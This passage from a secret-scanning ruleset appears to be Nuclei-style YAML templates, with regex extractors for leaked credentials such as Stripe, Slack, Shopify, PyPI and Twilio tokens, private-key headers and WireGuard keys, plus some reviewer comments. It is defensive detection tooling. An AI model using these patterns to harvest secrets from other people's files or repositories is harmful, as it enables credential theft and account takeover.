file,keys,token,paypal 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}" 16 | # digest: 490a00463044022056d84dc6d601838e144b52aad17f5d96f5d7e968e394d85f12af03219b51d114022031accb17f2ac43db6480cb37ecd697e1c9b44aea60e02212aecf0eaa8163b0b8:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/pictatic-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: pictatic-api-key 2 | 3 | info: 4 | name: Pictatic API Key 5 | author: gaurang 6 | severity: high 7 | tags: keys,file,token 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "sk_live_[0-9a-z]{32}" 16 | # digest: 4a0a00473045022032fdd5dc224eeaffdef7c05502dfedc31e1bc930a446a4321c9b4e0943bff1c702210091f33fc218848d1e5987c600944cc9ba59195eb6891d01cd0052263c224464f8:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/postman-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: postman-api-key 2 | 3 | info: 4 | name: Postman API Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/postman.yml 9 | - https://learning.postman.com/docs/developer/intro-api/ 10 | metadata: 11 | verified: true 12 | tags: postman,keys,file,token 13 | file: 14 | - extensions: 15 | - all 16 | 17 | extractors: 18 | - type: regex 19 | part: body 20 | regex: 21 | - '\b(PMAK-[a-zA-Z0-9]{24}-[a-zA-Z0-9]{34})\b' 22 | 23 | # digest: 4b0a00483046022100e158e3c9539a86553368be020b6a63e4d2d7383d5ebabfc763746408d78466c3022100dd689e22c94823f880d079b79edb861cfc02f9dd2118c70b8fc23efe6047c933:922c64590222798bb761d5b6d8e72950 24 | 
--------------------------------------------------------------------------------
/scan/gadget/sensitive/keys/private-key.yaml:
--------------------------------------------------------------------------------
1 | id: private-key
2 |
3 | info:
4 |   name: Private Key Detect
5 |   author: gaurang,geeknik
6 |   severity: high
7 |   tags: file,keys,token
8 | file:
9 |   - extensions:
10 |       - all
11 |
12 |     extractors:
13 |       - type: regex
14 |         regex:  # every entry is a literal marker string; none is anchored to a line start
15 |           - "BEGIN OPENSSH PRIVATE KEY"
16 |           - "BEGIN PRIVATE KEY"  # NOTE(review): does not cover the "BEGIN ENCRYPTED PRIVATE KEY" header, which lacks this exact substring
17 |           - "BEGIN RSA PRIVATE KEY"
18 |           - "BEGIN DSA PRIVATE KEY"
19 |           - "BEGIN EC PRIVATE KEY"
20 |           - "BEGIN PGP PRIVATE KEY BLOCK"
21 |           - "ssh-rsa"  # NOTE(review): key-type prefix of OpenSSH public-key lines (authorized_keys, *.pub), not private-key material; expect noisy hits under severity: high
22 |           - "ssh-dsa"  # NOTE(review): OpenSSH spells the DSA key type "ssh-dss"; confirm this literal is intended
23 |           - "ssh-ed25519"  # NOTE(review): public-key type prefix, same caveat as "ssh-rsa"
24 | # digest: 4a0a004730450220012882f3d65764d754d5f19daface386c18880d36acae666c3661a7b5fac3489022100fbcfdc07b0b9362befde988d181bf2f3af23847bcb67d65249c51c918db3a4db:922c64590222798bb761d5b6d8e72950
--------------------------------------------------------------------------------
/scan/gadget/sensitive/keys/pypi-token.yaml:
--------------------------------------------------------------------------------
1 | id: pypi-token
2 |
3 | info:
4 |   name: PyPI Upload Token
5 |   author: DhiyaneshDK
6 |   severity: info
7 |   reference:
8 |     - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/pypi.yml
9 |     - https://github.com/pypa/warehouse/issues/6051
10 |     - https://pypi.org/project/pypitoken/
11 |   metadata:
12 |     verified: true
13 |   tags: file,keys,pypi,token
14 | file:
15 |   - extensions:
16 |       - all
17 |
18 |     extractors:
19 |       - type: regex
20 |         part: body
21 |         regex:
22 |           - "(pypi-AgEIcHlwaS5vcmc[a-zA-Z0-9_-]{50,})"
23 | # digest: 4b0a004830460221008fd309bb55fdcb10af63f0e5c49e66f96b5b63598001fd085e6ad1d7db4676480221009f8481869b196778dc1aa0a750367371173d1f41449f4dcb5cb906eaaa9f377b:922c64590222798bb761d5b6d8e72950
--------------------------------------------------------------------------------
/scan/gadget/sensitive/keys/razorpay-client-id.yaml:
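--------------------------------------------------------------------------------
1 | id: razorpay-client-id
2 |
3 | info:
4 |   name: Razorpay Client ID
5 |   author: Devang-Solanki
6 |   severity: high
7 |   reference:
8 |     - https://github.com/streaak/keyhacks#Razorpay-keys
9 |     - https://docs.gitguardian.com/secrets-detection/detectors/specifics/razorpay_apikey
10 |   tags: file,keys,token,razorpay
11 | file:
12 |   - extensions:
13 |       - all
14 |
15 |     extractors:
16 |       - type: regex
17 |         regex:
18 |           - "rzp_(live|test)_.{14}"
19 | # digest: 490a00463044022017958bca8d151dc9ccf82c6616ee782cd94dcfb9604195b37eab0e712de46b3a02205a23692aefd5d8b35b942ea874507b2b25b217c384ac028b05bf3882293cb32e:922c64590222798bb761d5b6d8e72950
--------------------------------------------------------------------------------
/scan/gadget/sensitive/keys/react/reactapp-password.yaml:
--------------------------------------------------------------------------------
1 | id: reactapp-password
2 |
3 | info:
4 |   name: React App Password
5 |   author: DhiyaneshDK
6 |   severity: info
7 |   reference:
8 |     - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/react.yml
9 |     - https://create-react-app.dev/docs/adding-custom-environment-variables/
10 |     - https://stackoverflow.com/questions/48699820/how-do-i-hide-an-api-key-in-create-react-app
11 |   metadata:
12 |     verified: true
13 |   tags: react,keys,file
14 |
15 | file:
16 |   - extensions:
17 |       - all
18 |
19 |     extractors:
20 |       - type: regex
21 |         part: body
22 |         regex:
23 |           # The optional "WORD" follows "_PASS" with no whitespace in between: a "\s+"
24 |           # at that point would demand a space inside the variable name, so the common
25 |           # REACT_APP_..._PASSWORD= spelling would never match.
26 |           - \bREACT_APP(?:_[A-Z0-9]+)*_PASS(?:WORD)?\s*=\s*['"]?([^\s'"$]{6,})(?:[\s'"$]|$)
27 | # NOTE(review): the digest below was issued for the pre-edit text; presumably it must be regenerated (template re-signed) after this change.
28 | # digest: 4b0a00483046022100b4791a0989f14242e6ffe187281643b8b1417e5aba7fe98f353e37dbdc2ffb6c022100c3eee981ff792f8372f7f9292d0e73e0718b69a12d6d40ba0a58dff15dc3f948:922c64590222798bb761d5b6d8e72950
--------------------------------------------------------------------------------
/scan/gadget/sensitive/keys/react/reactapp-username.yaml: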
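--------------------------------------------------------------------------------
1 | id: reactapp-username
2 |
3 | info:
4 |   name: React App Username
5 |   author: DhiyaneshDK
6 |   severity: info
7 |   reference:
8 |     - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/react.yml
9 |     - https://create-react-app.dev/docs/adding-custom-environment-variables/
10 |     - https://stackoverflow.com/questions/48699820/how-do-i-hide-an-api-key-in-create-react-app
11 |   metadata:
12 |     verified: true
13 |   tags: react,keys,file
14 |
15 | file:
16 |   - extensions:
17 |       - all
18 |
19 |     extractors:
20 |       - type: regex
21 |         part: body
22 |         regex:
23 |           # The optional "NAME" follows "_USER" with no whitespace in between: a "\s+"
24 |           # at that point would demand a space inside the variable name, so the common
25 |           # REACT_APP_..._USERNAME= spelling would never match.
26 |           - \bREACT_APP(?:_[A-Z0-9]+)*_USER(?:NAME)?\s*=\s*['"]?([^\s'"$]{3,})(?:[\s'"$]|$)
27 | # NOTE(review): the digest below was issued for the pre-edit text; presumably it must be regenerated (template re-signed) after this change.
28 | # digest: 4a0a0047304502201077003a86f122901374676e5f9dfda39f6c54f870a6e4f12b7dd01707a3a5e2022100c998646fe193fa833a18772b90679efa1ba4cca48a55a2da1c839b79e50b4cfd:922c64590222798bb761d5b6d8e72950
--------------------------------------------------------------------------------
/scan/gadget/sensitive/keys/rubygems-key.yaml:
--------------------------------------------------------------------------------
1 | id: rubygems-key
2 |
3 | info:
4 |   name: RubyGems API Key
5 |   author: DhiyaneshDK
6 |   severity: info
7 |   reference:
8 |     - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/rubygems.yml
9 |     - https://guides.rubygems.org/rubygems-org-api/
10 |     - https://guides.rubygems.org/api-key-scopes/
11 |   metadata:
12 |     verified: true
13 |   tags: file,keys,rubygems,token,ruby
14 | file:
15 |   - extensions:
16 |       - all
17 |
18 |     extractors:
19 |       - type: regex
20 |         part: body
21 |         regex:
22 |           - "(rubygems_[a-f0-9]{48})"
23 | # digest: 4a0a0047304502207bd78ce7b44dacf6aae4fbaa6afa5d82c7085d2cb323667240aff8b7d949cedb022100eeb152ea7c2cced5093efcfd79da8b9d80a89d1a8eb29b0ee3ed50ae61a49f15:922c64590222798bb761d5b6d8e72950
--------------------------------------------------------------------------------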
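/scan/gadget/sensitive/keys/s3-bucket.yaml:
--------------------------------------------------------------------------------
1 | id: s3-bucket
2 |
3 | info:
4 |   name: S3 Bucket Detect
5 |   author: gaurang
6 |   severity: info
7 |   tags: file,keys,token,bucket
8 | file:
9 |   - extensions:
10 |       - all
11 |
12 |     extractors:
13 |       - type: regex
14 |         regex:
15 |           - "[a-z0-9.-]+\\.s3\\.amazonaws\\.com"
16 |           # The region segment takes "+" like the path-style pattern at the end of this
17 |           # list; a bare one-character class only matches single-character regions, so
18 |           # regional virtual-hosted bucket names would go undetected.
19 |           - "[a-z0-9.-]+\\.s3-[a-z0-9-]+\\.amazonaws\\.com"
20 |           - "[a-z0-9.-]+\\.s3-website[.-](eu|ap|us|ca|sa|cn)"
21 |           - "//s3\\.amazonaws\\.com/[a-z0-9._-]+"
22 |           - "//s3-[a-z0-9-]+\\.amazonaws\\.com/[a-z0-9._-]+"
23 | # NOTE(review): the digest below was issued for the pre-edit text; presumably it must be regenerated (template re-signed) after this change.
24 | # digest: 4a0a00473045022100c3ed21e6ff1fb637d42e18ec4636575c7df1069d9e355656d5f77ddb3a8fc8d7022027fc3fa8178e359af3509cc94dc1bf96cade6095d69409c4f521ef0175b091aa:922c64590222798bb761d5b6d8e72950
--------------------------------------------------------------------------------
/scan/gadget/sensitive/keys/salesforce/salesforce-access.yaml:
--------------------------------------------------------------------------------
1 | id: salesforce-access
2 |
3 | info:
4 |   name: Salesforce Access Token
5 |   author: DhiyaneshDK
6 |   severity: info
7 |   reference:
8 |     - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/salesforce.yml
9 |   metadata:
10 |     verified: true
11 |   tags: salesforce,keys,file
12 |
13 | file:
14 |   - extensions:
15 |       - all
16 |
17 |     extractors:
18 |       - type: regex
19 |         part: body
20 |         regex:
21 |           - \b(00[a-zA-Z0-9]{13}![a-zA-Z0-9._]{96})(?:\b|$|[^a-zA-Z0-9._])
22 | # digest: 490a0046304402207a4efb9c2401eaa2ebf49fcc5ec4676dfc142a5f5d607777827383c94bf144f102207b75489de473e1c5e3264e2d664fbb87cecbfc5811b20e6ac658fcd3f1415806:922c64590222798bb761d5b6d8e72950
--------------------------------------------------------------------------------
/scan/gadget/sensitive/keys/sauce-access-token.yaml:
--------------------------------------------------------------------------------
1 | id: sauce-access-token
2 |
3 | info:
4 |   name: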
Sauce Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/sauce.yml 9 | metadata: 10 | verified: true 11 | tags: file,keys,sauce,token 12 | file: 13 | - extensions: 14 | - all 15 | 16 | extractors: 17 | - type: regex 18 | part: body 19 | regex: 20 | - '(?i)sauce.{0,50}\b([a-f0-9-]{36})\b' 21 | # digest: 490a00463044022009ca563154c28786be32017d641fca7d37b8615cd7054e15823cff495a98bba3022066116c3e58abf5f5091e8f649632b0a9768878dee3a7ea572eedac7adcdefdd6:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/segment-public-api.yaml: -------------------------------------------------------------------------------- 1 | id: segment-public-api 2 | 3 | info: 4 | name: Segment Public API Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/segment.yml 9 | - https://segment.com/docs/api/public-api/ 10 | - https://segment.com/blog/how-segment-proactively-protects-customer-api-tokens/ 11 | metadata: 12 | verified: true 13 | tags: keys,file,segment,token 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - '(sgp_[a-zA-Z0-9]{64})' 23 | # digest: 4a0a0047304502202853fa0be0aad155b1bf710601dcb5443ebc8151a5852ae0e2c70357f8106f7c022100ab93a75342e2a408aa930452457c8bd908f297beb34396cf97af7ed89e76cf38:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/sendgrid-api.yaml: -------------------------------------------------------------------------------- 1 | id: sendgrid-api-key-file 2 | 3 | info: 4 | name: Sendgrid API Key 5 | author: gaurang 6 | severity: high 7 | tags: keys,file,token,sendgrid 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: 
regex 14 | regex: 15 | - "SG\\.[a-zA-Z0-9]{22}\\.[a-zA-Z0-9]{43}" 16 | # digest: 4b0a00483046022100d3c8e8d194bf1de6ea48f9c0ed47cf49cc66a5f44195732b29617199ae5a360b022100d00c1fa924b6444959e020764b71559bc85f140c3c912d76e0fc6c35abe161d9:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/shopify-custom-token.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-custom-token 2 | 3 | info: 4 | name: Shopify Custom App Access Token 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "shpca_[a-fA-F0-9]{32}" 16 | # digest: 4a0a00473045022034a27b39b96e56d6c5c5f0bb8437e6760ba81fa31281a386906e8eaea515bca9022100b8c26487144b3cc4e78cfd69fc39a62fe1eab148e86bcd6101a5beeb2ec3015e:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/shopify-private-token.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-private-token 2 | 3 | info: 4 | name: Shopify Private App Access Token 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "shppa_[a-fA-F0-9]{32}" 16 | # digest: 4b0a004830460221008a9fcfd1953cd27472015171cc2ff718e69112124812210ea6ba818da8c0de17022100a5dd54d3323017b989e594baf393a6915d32c96622b2be024cfad826b8a9d773:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/shopify-public-access.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-public-access 2 | 3 | info: 4 | name: Shopify Access Token (Public App) 5 | author: DhiyaneshDK 6 | severity: info 
7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/shopify.yml 9 | - https://shopify.dev/apps/auth 10 | - https://shopify.dev/changelog/app-secret-key-length-has-increased 11 | metadata: 12 | verified: true 13 | tags: file,keys,shopify,token 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - '\b(shpat_[a-fA-F0-9]{32})\b' 23 | # digest: 4a0a00473045022056ae9c25283c7b064051f029d5dba8a224e83494727342a07f6ac9e97c7d96ad02210094d395337ca85abb5d825cab42781d3a2091f59355519823e9b7ec7994b8bd70:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/shopify-shared-secret.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-shared-secret 2 | 3 | info: 4 | name: Shopify Shared Secret 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "shpss_[a-fA-F0-9]{32}" 16 | # digest: 4a0a00473045022070a5f8b18d6bfa572f7903f81f2f46a542b0e08c7dd5a822be8d79ded225a81e022100f75c2fa4f6a9aa7217aab9cf51b808d6008d492b2f8230650519227e95d98050:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/shopify-token.yaml: -------------------------------------------------------------------------------- 1 | id: shopify-access-token 2 | 3 | info: 4 | name: Shopify Access Token 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "shpat_[a-fA-F0-9]{32}" 16 | # digest: 4a0a0047304502200b41777dd82b3d396f4d76d75a526b7f5f863f8f1d2b4e313990480c398917ef022100810ddcd217e57655538d9153e898ad34e32c9b3179aceac031fbaf698de6ecc4:922c64590222798bb761d5b6d8e72950 
-------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/slack-api.yaml: -------------------------------------------------------------------------------- 1 | id: slack-api 2 | 3 | info: 4 | name: Slack API Key 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token,slack 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "xox[baprs]-([0-9a-zA-Z]{10,48})?" 16 | # digest: 4a0a004730450220098e1929b6ec4c0b3e189cebf5142b7ee75dfd23c8c9303e1a9b43f25e00c94b02210094541a8012719eec9a5b6fb643a3ef4050a67ef02165ba3eb94120d6458fb5c7:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/slack-webhook.yaml: -------------------------------------------------------------------------------- 1 | id: slack-webhook 2 | 3 | info: 4 | name: Slack Webhook 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token,slack 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "https://hooks.slack.com/services/T[0-9A-Za-z\\-_]{8}/B[0-9A-Za-z\\-_]{8}/[0-9A-Za-z\\-_]{24}" 16 | # digest: 490a00463044022030754b3461d730219fc7c4e9ce0b08cb582a6842e1161dd92551d5c86bde1a88022070d798d9356477fdda4e122fe64f5b6f981b7db9d85596b65e8e49b20f2dc657:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/square-access-token.yaml: -------------------------------------------------------------------------------- 1 | id: square-access-token 2 | 3 | info: 4 | name: Square Access Token 5 | author: gaurang,daffainfo 6 | severity: high 7 | tags: file,keys,token,square 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "EAAAE[a-zA-Z0-9_-]{59}" 16 | - "sq0atp-[0-9A-Za-z\\-_]{22}" 17 | # digest: 
490a00463044022016fc50e7940f4fb9d85db1563b7e86d644facdd66f530692b600d6cb0c4d3438022050fff84340f9f8afe3efbaeb9063ebc13bb5f4df8c13f328258d07ee43cc1998:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/square-oauth-secret.yaml: -------------------------------------------------------------------------------- 1 | id: square-oauth-secret 2 | 3 | info: 4 | name: Square OAuth Secret 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token,square 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "sq0csp-[0-9A-Za-z\\-_]{43}" 16 | # digest: 4b0a00483046022100b9d713ce6825a6aa6f3a38bb156f20588d72be414cdb570f0946f7dda4c809c7022100ab886a6c8e1afb2b271507fc2fe390137235ad84e1de02247de49ee5a86e3cfa:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/stackhawk-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: stackhawk-api-key 2 | 3 | info: 4 | name: StackHawk API Key 5 | author: hazana 6 | severity: medium 7 | reference: 8 | - https://docs.stackhawk.com/apidocs.html 9 | metadata: 10 | verified: true 11 | tags: file,keys,token 12 | file: 13 | - extensions: 14 | - all 15 | 16 | extractors: 17 | - type: regex 18 | regex: 19 | - "hawk\\.[0-9A-Za-z\\-_]{20}\\.[0-9A-Za-z\\-_]{20}" 20 | # digest: 4a0a0047304502210097611c22dad431694acb1a7b7233bb23042461df6249cc72c417adf3d005f1250220257f95a6d89864ee22c1465cbd0bffb16a05aa4f28787ec0d65a7407d3258166:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/stripe-api-key.yaml: -------------------------------------------------------------------------------- 1 | id: stripe-api-key 2 | 3 | info: 4 | name: Stripe API Key 5 | author: gaurang 6 | severity: high 7 | tags: 
file,keys,token,stripe 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "(?i)stripe(.{0,20})?[sr]k_live_[0-9a-zA-Z]{24}" 16 | # digest: 4a0a00473045022100dcb13029ebf479d6aca563b1f1955ac0498c974f35af12006c2f9ebbb45c66770220286512d9e87b5923252c2c4fbb86ee621c42a66ec40ef13cd70937292e099cfa:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/telegram-token.yaml: -------------------------------------------------------------------------------- 1 | id: telegram-token 2 | 3 | info: 4 | name: Telegram Bot Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/telegram.yml 9 | - https://core.telegram.org/bots/api 10 | - https://core.telegram.org/bots/features#botfather 11 | metadata: 12 | verified: true 13 | tags: file,keys,telegram,token 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - '\b(\d+:AA[a-zA-Z0-9_-]{32,33})' 23 | # digest: 4a0a0047304502200d5ed3c8bfb5e36d8156b70f6307bdd05abdf92a55e6d486eac1ec3c88de967f022100fcd85801f37c8f52fa00d37262a861f0deec088f50d750da360932ff8ba21515:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/thingsboard/thingsboard-access.yaml: -------------------------------------------------------------------------------- 1 | id: thingsboard-access 2 | 3 | info: 4 | name: ThingsBoard Access Token 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/thingsboard.yml 9 | - https://thingsboard.io/docs/paas/reference/http-api/ 10 | - https://thingsboard.io/docs/paas/reference/coap-api/ 11 | metadata: 12 | verified: true 13 | tags: thingsboard,keys,file 14 | 15 | 
file: 16 | - extensions: 17 | - all 18 | 19 | extractors: 20 | - type: regex 21 | part: body 22 | regex: 23 | - thingsboard\.cloud/api/v1/([a-z0-9]{20}) 24 | # digest: 4b0a00483046022100e85330533e34d275242ad231bb436951116dabe56acafa94f3db46fca45ed3ae022100a799502b27b8e16f77e8406be58127578dd5f3465dab8b0a2381ee944432c239:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/twilio-api.yaml: -------------------------------------------------------------------------------- 1 | id: twilio-api 2 | 3 | info: 4 | name: Twilio API Key 5 | author: gaurang 6 | severity: high 7 | tags: file,keys,token 8 | file: 9 | - extensions: 10 | - all 11 | 12 | extractors: 13 | - type: regex 14 | regex: 15 | - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}" 16 | # digest: 4b0a004830460221009edd6055d2937d438ddc5a460cb57ceaf448ee273900a3a2ff9d217329cbaf170221009df1b8754959e50ef0155608d8ea98f45e87c59221868f7ad7a762ba88ba28fc:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/twitter/twitter-client.yaml: -------------------------------------------------------------------------------- 1 | id: twitter-client 2 | 3 | info: 4 | name: Twitter Client ID 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/twitter.yml 9 | - https://developer.twitter.com/en/docs/authentication/overview 10 | metadata: 11 | verified: true 12 | tags: twitter,keys,file 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)\btwitter.?(?:api|app|application|client|consumer|customer)?.?(?:id|identifier|key).{0,2}\s{0,20}.{0,2}\s{0,20}.{0,2}\b([a-z0-9]{18,25})\b 23 | # digest: 
4a0a00473045022030cb9bb226fc38ff17accc2fbe89603cae16c35050ec725ad20ce14d5fbc5ad2022100860577843f28d261d7fbf35ef59577e5fd0e84a50eb370cfbd714f1039338c19:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/twitter/twitter-secret.yaml: -------------------------------------------------------------------------------- 1 | id: twitter-secret 2 | 3 | info: 4 | name: Twitter Secret Key 5 | author: DhiyaneshDK,gaurang,daffainfo 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/twitter.yml 9 | - https://developer.twitter.com/en/docs/authentication/overview 10 | metadata: 11 | verified: true 12 | tags: twitter,keys,file 13 | 14 | file: 15 | - extensions: 16 | - all 17 | 18 | extractors: 19 | - type: regex 20 | part: body 21 | regex: 22 | - (?i)twitter.?(?:api|app|application|client|consumer|customer|secret|key).?(?:key|oauth|sec|secret)?.{0,2}\s{0,20}.{0,2}\s{0,20}.{0,2}\b([a-z0-9]{35,44})\b 23 | # digest: 4a0a00473045022100ae8d7dcc6d380f9b0ba6d16ca558e7af6254078b3f1a0a2230f8ddc28f47267102206348551061cffebd4da2b42ec393373ef0987eeeb4382f0e517c38c836fb46cf:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/wireguard/wireguard-preshared.yaml: -------------------------------------------------------------------------------- 1 | id: wireguard-preshared 2 | 3 | info: 4 | name: WireGuard Preshared Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/wireguard.yml 9 | - https://www.wireguard.com/quickstart/ 10 | - https://manpages.debian.org/testing/wireguard-tools/wg.8.en.html 11 | - https://gist.github.com/lanceliao/5d2977f417f34dda0e3d63ac7e217fd 12 | metadata: 13 | verified: true 14 | tags: 
wireguard,keys,file 15 | 16 | file: 17 | - extensions: 18 | - all 19 | 20 | extractors: 21 | - type: regex 22 | part: body 23 | regex: 24 | - PresharedKey\s*=\s*([A-Za-z0-9+/]{43}=) 25 | # digest: 4a0a00473045022055b7809c89c44f01db811de03d659329878fabbb6006f65a5cfc4c231e72b5ce022100916852a09714e7cf50f5e239c48dba2b243d889df28c54c7671cb3b0ec8dc9e5:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/wireguard/wireguard-private.yaml: -------------------------------------------------------------------------------- 1 | id: wireguard-private 2 | 3 | info: 4 | name: WireGuard Private Key 5 | author: DhiyaneshDK 6 | severity: info 7 | reference: 8 | - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/wireguard.yml 9 | - https://www.wireguard.com/quickstart/ 10 | - https://manpages.debian.org/testing/wireguard-tools/wg.8.en.html 11 | - https://gist.github.com/lanceliao/5d2977f417f34dda0e3d63ac7e217fd 12 | metadata: 13 | verified: true 14 | tags: wireguard,keys,file 15 | 16 | file: 17 | - extensions: 18 | - all 19 | 20 | extractors: 21 | - type: regex 22 | part: body 23 | regex: 24 | - PrivateKey\s*=\s*([A-Za-z0-9+/]{43}=) 25 | # digest: 4a0a004730450221008bd7fd7c9c74eb3c6d2f1d5e4c8cc9c0fcc230534b094814ee0ca7dff2f7f9800220688ed7ae288880609a373ea69defa1d5ed93ca3fcb312e5c4ea2acea46b2e27c:922c64590222798bb761d5b6d8e72950 -------------------------------------------------------------------------------- /scan/gadget/sensitive/keys/zapier-webhook.yaml: -------------------------------------------------------------------------------- 1 | id: zapier-webhook 2 | 3 | info: 4 | name: Zapier Webhook 5 | author: Devang-Solanki 6 | severity: high 7 | reference: 8 | - https://github.com/streaak/keyhacks#Zapier-Webhook-Token 9 | - https://docs.gitguardian.com/secrets-detection/detectors/specifics/zapier_webhook_url 10 | tags: file,keys,token,zapier 11 | 
file:
  - extensions:
      - all

    extractors:
      - type: regex
        regex:
          - 'https://(?:www.)?hooks\.zapier\.com/hooks/catch/[A-Za-z0-9]+/[A-Za-z0-9]+/'
# digest: 4a0a004730450221009177769af7a8468ea644e7787fa6c35c65b057e8ad3b35b6d27e064a3763add30220734af477f469387822e7570ce196e8907ac3d4bb13b77be3d6b432944fce1e4a:922c64590222798bb761d5b6d8e72950
--------------------------------------------------------------------------------
/scan/gadget/sensitive/keys/zendesk-secret-key.yaml:
--------------------------------------------------------------------------------
id: zendesk-secret-key

info:
  name: Zendesk Secret Key
  author: DhiyaneshDK
  severity: info
  reference:
    - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.yaml
    - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/zendesk-secret-key.go
  metadata:
    verified: true
  tags: zendesk,file,keys
file:
  - extensions:
      - all

    extractors:
      - type: regex
        part: body
        regex:
